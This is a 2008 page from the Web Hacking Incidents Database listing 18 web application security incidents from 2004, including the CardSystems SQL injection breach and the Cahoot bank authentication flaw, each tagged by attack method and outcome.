|
The Web Hacking Incidents Database
Last update:17 February 2008
List of Incidents for a Year
Select Year: 1999, 2000, 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008
List of incidents for the year 2004
18 incidents listed
Reported: 25 October 2007Occurred: 01 November 2004
Classifications:
- Attack Method: Insufficient Authentication
- Attack Method: Predictable Resource Location
- Outcome: Disclosure Only
Following a software upgrade, Cahoot, a UK based Internet only bank allowed accessing user accounts by guessing their user names. At least on one page allowed accessing an account by only specifying the user name in the URL. The bug was open for 12 days before being discovered.
The site was taken off line for 10 hours to fix the issue. It is a significant incident, as it is one of those rare occasions where vulnerability was serious enough to force the organization to just take the site off line until it is fixed.
We somehow missed this story so it finds its way to WHID only now in late 2007.
References:
Reported: 20 April 2006Occurred: 01 September 2004
Classifications:
- Attack Method: SQL Injection
This entry is a very important one. Most are already familiar with the infamous CardSystems incident where hackers stole 263,000 credit card numbers, exposed 40 million more and several million dollars fraudulent credit and debit card purchases had been made with these counterfeit cards. As a result of the breach CardSystems nearly went out of business and was eventually purchased by PayByTouch. CardSystems is considered by many the most severe publicized information security breach ever and it caused company share holders, financial institutes and card holders damage of millions of dollars.
But since the publication of the incident a year ago the way in which the breach occurred remained a mystery.
Recently new articles about the case (listed below) revealed that SQL injection was used by the attackers to install malicious script on the CardSystems web application database which where scheduled to run every four days, extract records, zip them and export them to an FTP site.
This is one of the most stunning examples where a web application security hole was used to launch a targeted attack in order to steal money.
References:
- Cleaning up after a hack job: CardSystems' Christensen
News Story, Information Security (mirror), 14 April 2006
- FTC complain In the Matter of CardSystems Solutions
Legal Document, FTC,
- Midrange CardSystems Wiki
Wiki, Midrange,
- CardSystems was a Web Application Hack
Mailing List Post, Cesar Cerrudo, Argeniss, 18 April 2006
- CardSystems Exposes 40 Million Identities
Blog Entry, Bruce Schneier, 23 June 2005
Reported: 08 November 2005Occurred: 06 December 2004
Classifications:
- Attack Method: Cross Site Scripting (XSS)
- Attack Method: Content Spoofing
Phishing based on XSS (Same vulnerability but a different attack that the similar September 2004 attack)
References:
Reported: 04 August 2005Occurred: 26 January 2004
Classifications:
- Attack Method: Credential/Session Prediction
- Outcome: Disclosure Only
References:
Reported: 04 August 2005Occurred: 02 February 2004
Classifications:
- Attack Method: Credential/Session Prediction
- Outcome: Disclosure Only
References:
Reported: 04 August 2005Occurred: 02 February 2004
Classifications:
- Attack Method: SQL Injection
- Outcome: Disclosure Only
References:
Reported: 04 August 2005Occurred: 02 February 2004
Classifications:
- Attack Method: Insufficient Authorization
- Outcome: Disclosure Only
References:
Reported: 04 August 2005Occurred: 02 February 2004
Classifications:
- Attack Method: Insufficient Authorization
- Outcome: Disclosure Only
References:
Reported: 04 August 2005Occurred: 26 January 2004
Classifications:
- Attack Method: Insufficient Authorization
- Outcome: Disclosure Only
References:
Reported: 04 August 2005Occurred: 02 February 2004
Classifications:
- Attack Method: Insufficient Authorization
- Outcome: Disclosure Only
References:
Reported: 11 July 2005Occurred: 27 December 2004
Classifications:
- Attack Method: Cross Site Scripting (XSS)
- Outcome: Disclosure Only
An XSS was found in Lycos Web Mail
References:
Reported: 11 July 2005Occurred: 27 October 2004
Classifications:
- Attack Method: Cross Site Scripting (XSS)
- Outcome: Disclosure Only
An XSS was found in G-Mail
References:
Reported: Occurred: 25 December 2004
Classifications:
- Attack Method: OS Commanding
phpBB worm
References:
Reported: Occurred: 21 December 2004
Classifications:
- Attack Method: OS Commanding
Worm used Google to locate sites vulnerable to OS
References:
Reported: Occurred: 28 September 2004
Classifications:
- Attack Method: Cross Site Scripting (XSS)
- Country: USA
- Outcome: Phishing
- Vertical: Finance
Phishing based on XSS
References:
Reported: Occurred: 04 March 2004
Classifications:
- Attack Method: Insufficient Authorization
Previously moderated weather announcements could be changed by the user
References:
Reported: Occurred: 14 June 2004
Classifications:
- Attack Method: Insufficient Authentication
- Attack Method: Insufficient Authorization
- Outcome: Disclosure Only
A billing information system required only phone number and zip code to pull up account details
References:
Reported: Occurred: 30 June 2004
Classifications:
- Attack Method: Cross Site Scripting (XSS)
- Attack Method: SQL Injection
- Outcome: Disclosure Only
References:
This work is licensed under the Creative Commons Attribution License. To view a copy of this license, visit http://creativecommons.org/licenses/by/2.5/ or send a letter to Creative Commons, 559 Nathan Abbott Way, Stanford, California 94305, USA.
|
